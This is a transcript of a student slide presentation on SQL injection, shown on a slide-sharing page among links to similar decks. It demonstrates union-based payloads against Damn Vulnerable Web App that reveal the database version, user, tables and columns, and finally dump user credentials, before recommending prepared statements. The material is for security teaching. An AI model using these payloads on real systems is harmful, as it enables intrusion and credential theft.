SQL Injection By Wenonah Abadilla.

Slides:



Advertisements
Similar presentations
Nic Shulver, Introduction to SQL Topics covered Structured Query Language What can it do? Advantages of SQL Why bother with SQL?
Advertisements

Introduction The concept of “SQL Injection”
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
CSC 2720 Building Web Applications Database and SQL.
Chapter 7 Managing Data Sources. ASP.NET 2.0, Third Edition2.
The OWASP Foundation Injection Flaws.
SJSU CS157B Dr. Lee1  2004 Jenny Mitchell Two Useful Tools You Can’t Live Without by Jenny Mitchell SJSU CS157B Section PHP and MySQL.
CSCI 6962: Server-side Design and Programming
SQL Power Injector Avadanei AlinBalan Robert. What is SQL Power Injector ?  A graphical application created in C#.Net 1.1 that helps the penetration.
CSCI 6962: Server-side Design and Programming JDBC Database Programming.
Copyright © 2003 Pearson Education, Inc. Slide 8-1 The Web Wizard’s Guide to PHP by David Lash.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
Web Server Administration Chapter 7 Installing and Testing a Programming Environment.
Attacking Applications: SQL Injection & Buffer Overflows.
Class 1Intro to Databases Goals of this class Understand the architecture behind web database applications Gain a basic understanding of what relational.
PHP MySQL Introduction. MySQL is the most popular open-source database system. What is MySQL? MySQL is a database. The data in MySQL is stored in database.
MySQL Databases & PHP Integration Using PHP to write data to, and retrieve data from, a MySQL database.
CSC 2720 Building Web Applications Database and SQL.
SYST Web Technologies SYST Web Technologies Databases & MySQL.
Accessing Your MySQL Database from the Web with PHP (Ch 11) 1.
Intro to DatabasesClass 4 SQL REVIEW To talk to the database, you have to use SQL SQL is used by many databases, not just MySQL. SQL stands for Structured.
Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting MySQL – Inserting Data.
Introduction to InfoSec – SQLI and jQuery (R9)
Web Server Administration Chapter 7 Installing and Testing a Programming Environment.
SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister.
Security Considerations Steve Perry
Module Review Basic SQL commands: Create Database, Create Table, Insert and Select 2. Connect an SQL Database to PHP 3. Execute SQL Commands in.
WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas.
Database Security Cmpe 226 Fall 2015 By Akanksha Jain Jerry Mengyuan Zheng.
Class 1Intro to Databases Goals of this class Understand the architecture behind web database applications Gain a basic understanding of what relational.
JDBC CS 260 Database Systems. Overview  Introduction  JDBC driver types  Eclipse project setup  Programming with JDBC  Prepared statements  SQL.
CHAPTER 10 PHP MySQL Database
SQL Injection Anthony Brown March 4, 2008 IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions.
INFO 344 Web Tools And Development CK Wang University of Washington Spring 2014.
Distribution of Marks For Second Semester Internal Sessional Evaluation External Evaluation Assignment /Project QuizzesClass Attendance Mid-Term Test Total.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Web Applications Attacks A: SQL Injection Stored Cross Site Scripting Prof. Reuven Aviv Department of Computer Science Tel Hai Academic College Topics.
ADVANCED SQL.  The SQL ORDER BY Keyword  The ORDER BY keyword is used to sort the result-set by one or more columns.  The ORDER BY keyword sorts the.
SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements.
1 Section 1 - Introduction to SQL u SQL is an abbreviation for Structured Query Language. u It is generally pronounced “Sequel” u SQL is a unified language.
Hacker Games By Wenonah Abadilla. What is a Hacker Game? Learn and practice security concepts Fun-filled games.
 MySQL is a database system used on the web  MySQL is a database system that runs on a server  MySQL is ideal for both small and large applications.
“Why is my blog selling boner pills?” An introduction to common web application attacks such as SQLi, XSS and command injection.
Cosc 5/4765 Database security. Database Databases have moved from internal use only to externally accessible. –Organizations store vast quantities of.
Web Systems & Technologies
Database and Cloud Security
Database System Implementation CSE 507
Web Application Security
Web Systems & Technologies
Introduction to Dynamic Web Programming
WEB APPLICATION TESTING
Theodore Lawson CSCE548 Student Presentation, Topic #2
SQL INJECTION ATTACKS.
SQL Injection Attacks Many web servers have backing databases
Principles of report writing
ISC440: Web Programming 2 Server-side Scripting PHP 3
PHP and MySQL.
Chapter 13 Security Methods Part 3.
Lecture 2 - SQL Injection
IntroductionToPHP Static vs. Dynamic websites
SQL Injection Attacks John Sweetnam
MySQL Web Application Connecting to a MySQL database
PHP Forms and Databases.
Introduction to Web programming
SQL Injection Attack.
Presentation transcript:

SQL Injection By Wenonah Abadilla

Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements

What is SQL? Way you communicate with the database Structured Query Language Access and manipulate databases COSC 341 at IUP

What is SQL Injection? One of the most serious threats for Web Application Inject SQL commands into an SQL statement, via web page input. Alters an SQL statement and compromises the security of a web application Common with PHP and ASP applications due to the prevalence of older functional interfaces Occurs when Data enters a program from an untrusted source. The data used to dynamically construct a SQL query SQL Injection Harvesting SQL statements to render sensitive data

Types of SQLI Error Based Union Based Blind Causes an error and gather information from the error Union Based Combine two or more SQL statements into one result Blind Asking a true or false question

Consequences of SQL Injection Confidentiality Authentication Authorization Integrity

Damn Vulnerable Web Site Demo PHP/MySQL web application Aid for security professionals Test skills and tools in a legal environment Help developers better understand the process of securing web applications

$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;

Basic Injection Webpage is supposed to print ID, First name, and Surname $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘1’”;

Always True Scenario Saying display all records that are false and all records that are true %’ – probably not equal to anything, and will be false ‘0’=‘0’ – Is equal to true, because 0 will always equal 0 $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=‘0’”;

Display Database Version Notice the last displayed line This is the version of the mysql database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, version() # “;

Display Database User Notice the last displayed line Name of the database user that executed the behind the scenes PHP code $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, user() # ;

Display Database Name Notice the last displayed line This is the name of the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, database() # ;

Display All Tables in the information_schema Displays all the tables in the information_schema database INFORMATION_SCHEMA is the informational database Stores information about all other databases that the MySQL server maintains $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables #” ;

Display All User Tables in the information_schema Displays all tables that start with the prefix “user” in the information_schema database Quicker than looking through the previous output and manually looking for user table $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables where table_name like ‘user%’ #” ;

Display all Column fields in the User Table Displays all the columns in the users table Notice- user_id, first_name, last_name, user and password column $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #” ;

Display column Field Contents in the user table Successfully displayed all the necessary authentication information in the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null,concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #” ;

Prepared Statements and Bound Parameters The query and the data are sent to the SQL server separately Parameterized statements, Parameterized SQL Template for SQL Statements Values can be plugged into the query after the query is “prepared” and ready to be executed (?), Bound Parameters Placeholders where actual values are plugged in

Examples PHP using PDO Java using JDBC Statements sets “?” to an actual value that is stored in the id variable PHP using PDO Java using JDBC

Questions? Conclusion SQLI huge threat to web applications Use Prepared SQL Statements Download Damn Vulnerable Web App Questions?

Reference Page "Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb. 2015. <http://docs.oracle.com/cd/B10500_01/appdev.920/a96590/adg09dyn.htm>. "(Damn Vulnerable Web App (DVWA): Lesson 6)." Computer Security Student. N.p., n.d. Web. 17 Feb. 2015. <http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/>. "PHP Prepared Statements." W3schools. N.p., n.d. Web. 18 Feb. 2015. <http://www.w3schools.com/php/php_mysql_prepared_statements.asp>. "SQL Injection." OWASP. N.p., 14 Aug. 2014. Web. 19 Feb. 2015. <https://www.owasp.org/index.php/SQL_Injection>. "SQL Injection." W3school. N.p., n.d. Web. 15 Feb. 2015. <http://www.w3schools.com/sql/sql_injection.asp>.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com. Inc. All rights reserved.